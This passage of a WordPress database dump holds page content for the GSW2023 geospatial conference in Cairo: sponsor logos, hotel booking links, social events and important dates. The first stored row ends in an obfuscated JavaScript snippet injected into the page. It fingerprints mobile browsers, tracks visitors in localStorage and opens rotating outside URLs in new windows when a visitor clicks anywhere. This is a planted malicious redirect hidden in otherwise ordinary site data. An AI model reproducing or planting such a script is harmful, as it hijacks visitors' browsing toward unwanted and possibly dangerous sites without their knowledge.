)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 23:53:22','2023-07-18 23:53:22','',2685,'https://gsw2023.com/?p=5038',0,'revision','',0),
(5039,1,'2023-07-24 21:51:28','2023-07-24 21:51:28','','LOGO FINAL','','inherit','open','closed','','logo-final','','','2023-07-24 21:51:28','2023-07-24 21:51:28','',3066,'https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL.jpg',0,'attachment','image/jpeg',0),
(5040,1,'2023-07-24 21:55:31','2023-07-24 21:55:31','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690235638092{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span><a href=\"www.funtrip-travel.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5039\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL-300x240.jpg\" alt=\"\" width=\"263\" height=\"211\" /></a></h4>\n<p style=\"text-align: center;\">Email : gsw2023@funtrip-travel.com</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" 